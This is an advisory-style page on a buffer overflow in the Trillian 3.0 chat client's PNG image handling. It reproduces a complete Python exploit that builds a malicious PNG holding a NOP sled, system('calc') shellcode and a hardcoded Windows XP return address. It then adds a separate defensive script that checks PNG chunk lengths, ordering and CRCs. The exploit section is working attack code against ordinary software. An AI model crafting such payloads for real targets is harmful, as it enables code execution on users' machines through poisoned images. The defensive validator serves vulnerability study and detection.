Trillian is a fully featured, stand-alone, skinnable chat client that supports AIM, ICQ, MSN, Yahoo Messenger, and IRC.
Trillian contains a buffer overflow vulnerability in the way it handles PNG images. Presented here is an exploit for this vulnerability.
Credit:
The information has been provided by Tal zeltzer.
The original exploit can be found at: http://www.hackingdefined.com/exploits/trillian3.tar.gz
Vulnerable Systems:
* Trillian 3.0 Basic
Exploit:
##################################################################
# See-security Technologies ltd. #
# http://www.see-security.com #
# Trillian 3.0 PNG Image Processing Buffer overflow Exploit #
# Discovered and coded by: Tal zeltzer #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1
ReturnAddress = 0x77D7A145 # Address of "jmp esp" in ntdll.dll
SystemAddress = 0x77C28044 # Address Of the system() function
# PNG Header
PngOfDeath = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
PngOfDeath += "\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
PngOfDeath += "\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"
# Nops
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# system(calc) shellcode
PngOfDeath += "\x33\xC0\x50\x68\x63\x61\x6c\x63\x54\x5b\x50\x53\xb9"
PngOfDeath += struct.pack("<L",SystemAddress)
PngOfDeath += "\xFF\xD1"
# Junk Data
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# Return Address
PngOfDeath += struct.pack("<L",ReturnAddress)
# Jump Back Shellcode
PngOfDeath += "\x54\x59\xFE\xCD\x89\xE5\xFF\xE1"
# End Of File
PngOfDeath += "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF"
fileOut = open("Trillian.png","wb")
fileOut.write(PngOfDeath)
fileOut.close()
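The header bytes above declare a 64x64 palette image (colour type 3) followed directly by a tRNS chunk with a declared length of 0x1B9 (441 bytes). As an added example that is not part of the advisory or of Tal zeltzer's exploit, the following defender-side check walks a PNG's chunk framing and reports what an image loader should refuse before copying chunk data: a tRNS payload longer than the spec allows for the colour type, tRNS before PLTE, a declared length that runs past the end of the file, and CRC mismatches. The function name and the sample PNG bytes are constructed here for illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Largest tRNS payload the PNG spec allows, keyed by IHDR colour type:
# 0 greyscale (one 16-bit sample), 2 truecolour (three), 3 palette (<= 256 bytes).
TRNS_MAX_LEN = {0: 2, 2: 6, 3: 256}

def png_chunk_findings(data):
    """Walk a PNG's chunk list and return the structural problems found ([] if sane)."""
    findings = []
    if not data.startswith(PNG_SIGNATURE):
        return ["bad PNG signature"]
    pos, color_type, seen_plte = len(PNG_SIGNATURE), None, False
    while pos + 8 <= len(data):
        length, ctype_raw = struct.unpack(">I4s", data[pos:pos + 8])
        ctype = ctype_raw.decode("latin-1")
        if ctype == "tRNS":  # checks that need only the declared length, made before trusting it
            limit = TRNS_MAX_LEN.get(color_type)
            if limit is None:
                findings.append("tRNS not allowed for colour type %r" % color_type)
            elif length > limit:
                findings.append("tRNS length %d exceeds spec maximum %d" % (length, limit))
            if color_type == 3 and not seen_plte:
                findings.append("tRNS appears before PLTE")
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_bytes) < 4:
            findings.append("%s runs past end of file (%d of %d payload bytes present)" % (ctype, len(body), length))
            break
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype_raw + body) & 0xffffffff:
            findings.append("%s CRC mismatch" % ctype)
        if ctype == "IHDR" and length == 13:
            color_type = body[9]  # width(4) height(4) bit depth(1) colour type(1) ...
        elif ctype == "PLTE":
            seen_plte = True
        pos += 12 + length
    return findings

def _chunk(ctype, body):
    """Build one well-formed chunk; used only to construct the samples below."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xffffffff)

# Constructed samples: a 64x64 palette IHDR like the advisory's, first with proper
# PLTE/tRNS chunks, then followed directly by a tRNS chunk claiming 0x1B9 (441) bytes.
IHDR_64_PAL = _chunk(b"IHDR", struct.pack(">IIBBBBB", 64, 64, 8, 3, 0, 0, 0))
SANE_PNG = (PNG_SIGNATURE + IHDR_64_PAL + _chunk(b"PLTE", b"\x00\x00\x00\xff\xff\xff")
            + _chunk(b"tRNS", b"\x00\xff") + _chunk(b"IEND", b""))
OVERSIZED_TRNS_PNG = PNG_SIGNATURE + IHDR_64_PAL + struct.pack(">I", 0x1B9) + b"tRNS" + b"A" * 40
```

A loader that applies these checks can bound its copy by the spec maximum rather than by the attacker-controlled length field, and the same findings can be logged by a mail or file gateway to flag malformed images.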